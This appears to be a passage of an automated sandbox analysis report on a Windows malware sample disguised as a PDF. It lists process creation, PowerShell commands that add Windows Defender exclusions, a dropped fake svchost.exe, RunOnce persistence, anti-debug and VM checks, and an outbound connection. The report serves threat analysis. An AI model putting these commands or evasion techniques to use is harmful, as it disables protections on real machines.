Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /SpecialRun 4101d8 5504
Source: unknown | Process created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe'
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe' -Force
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: unknown | Process created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe'
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe'
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6556 -ip 6556
Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 2200
Source: unknown | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' -Force
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | Process created: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe' -Force
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | Process created: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe | Process created: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /SpecialRun 4101d8 5504
Source: C:\Windows\explorer.exe | Process created: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: RFQ - REF 208056-pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: RFQ - REF 208056-pdf.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, AdvancedRun.exe, 0000000B.00000000.311587089.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000D.00000000.329692687.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
Source: Binary string: C:\Users\user\Desktop\RFQ - REF 208056-pdf.PDB source: RFQ - REF 208056-pdf.exe, 00000000.00000002.394246360.00000000004F9000.00000004.00000010.sdmp
Source: Binary string: OnpeiVisualBasic.pdb source: RFQ - REF 208056-pdf.exe, 00000000.00000002.394246360.00000000004F9000.00000004.00000010.sdmp
Source: Binary string: O.pdb3X source: RFQ - REF 208056-pdf.exe, 00000000.00000002.394246360.00000000004F9000.00000004.00000010.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbA source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbn source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
Source: Binary string: hhRFQ - REF 208056-pdf.PDB source: RFQ - REF 208056-pdf.exe, 00000000.00000002.394246360.00000000004F9000.00000004.00000010.sdmp
Source: Binary string: System.Management.Automation.pdb-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer3215EBB53FAC1131AE0BD333C5EE6021672D9718EA31A8AEBD0DA0072F25D87DBA6FC90FFD598ED4DA35E44C398C454307E8E33B8426143DAEC9F596836F97C8F7479F source: powershell.exe, 00000011.00000002.548053273.0000000008392000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb^ source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp

Data Obfuscation:

Binary contains a suspicious time stamp
Source: initial sample | Static PE information: 0x85456217 [Wed Nov 7 16:00:23 2040 UTC]
Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe | Code function: 11_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | Code function: 0_2_0237E040 push 00000025h; retf
Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe | Code function: 11_2_0040B550 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe | Code function: 11_2_0040B50D push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe | Code function: 13_2_0040B550 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe | Code function: 13_2_0040B50D push ecx; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_0378BE90 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_08273BA8 pushad ; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_0830FE40 push eax; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_0830F861 push 00000007h; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_0830FEF8 push eax; mov dword ptr [esp], edx

Persistence and Installation Behavior:

Drops PE files with benign system names
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | File created: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\explorer.exe | Executable created and started: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | File created: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe | File created: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe

                      Boot Survival:

                      barindex
                      Creates an autostart registry key pointing to binary in C:\WindowsShow sources
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce XZFSGXzndMljLVEovPfqdSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCode function: 11_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce XZFSGXzndMljLVEovPfqdSJump to behavior
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce XZFSGXzndMljLVEovPfqdSJump to behavior
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce XZFSGXzndMljLVEovPfqdSJump to behavior
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce XZFSGXzndMljLVEovPfqdSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCode function: 11_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe Section loaded: OutputDebugStringW count: 1933
Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe Section loaded: OutputDebugStringW count: 1937
Source: C:\Windows\explorer.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4594
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2345
Source: C:\Windows\System32\svchost.exe TID: 6860 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5236 Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5236 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe TID: 6760 Thread sleep count: 67 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6212 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6212 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: powershell.exe, 00000009.00000003.517902896.0000000005964000.00000004.00000001.sdmp Binary or memory string: Hyper-V
Source: svchost.exe, 00000003.00000002.519119102.000002451B6C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000000F.00000002.512322019.0000000001329000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}\
Source: explorer.exe, 0000000F.00000002.512322019.0000000001329000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}\
Source: svchost.exe, 00000002.00000002.530073283.000001EAA1C4D000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000002.00000002.505437886.000001EA9C629000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW@0
Source: svchost.exe, 00000003.00000002.519119102.000002451B6C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000003.00000002.519119102.000002451B6C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000000F.00000002.512322019.0000000001329000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:DB
Source: svchost.exe, 00000003.00000002.515379536.000002451B067000.00000004.00000001.sdmp, svchost.exe, 00000004.00000002.504484042.0000027C99E29000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000003.00000002.519119102.000002451B6C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: powershell.exe, 00000009.00000003.517902896.0000000005964000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.524764005.0000000005201000.00000004.00000001.sdmp Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe Process information queried: ProcessInformation

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe Code function: 11_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe Network Connect: 172.67.172.17 80
Adds a directory exclusion to Windows Defender
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' -Force
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe' -Force
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' -Force
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe' -Force
Injects a PE file into foreign processes
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe Memory written: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe Code function: 11_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' -Force
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe Process created: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe' -Force
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe Process created: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe
Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /SpecialRun 4101d8 5504
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: powershell.exe, 00000009.00000002.536326386.0000000003B60000.00000002.00000001.sdmp, explorer.exe, 0000000F.00000002.515784160.00000000019E0000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
Source: powershell.exe, 00000009.00000002.536326386.0000000003B60000.00000002.00000001.sdmp, explorer.exe, 0000000F.00000002.515784160.00000000019E0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: powershell.exe, 00000009.00000002.536326386.0000000003B60000.00000002.00000001.sdmp, explorer.exe, 0000000F.00000002.515784160.00000000019E0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: powershell.exe, 00000009.00000002.536326386.0000000003B60000.00000002.00000001.sdmp, explorer.exe, 0000000F.00000002.515784160.00000000019E0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe Queries volume information: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe VolumeInformation
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
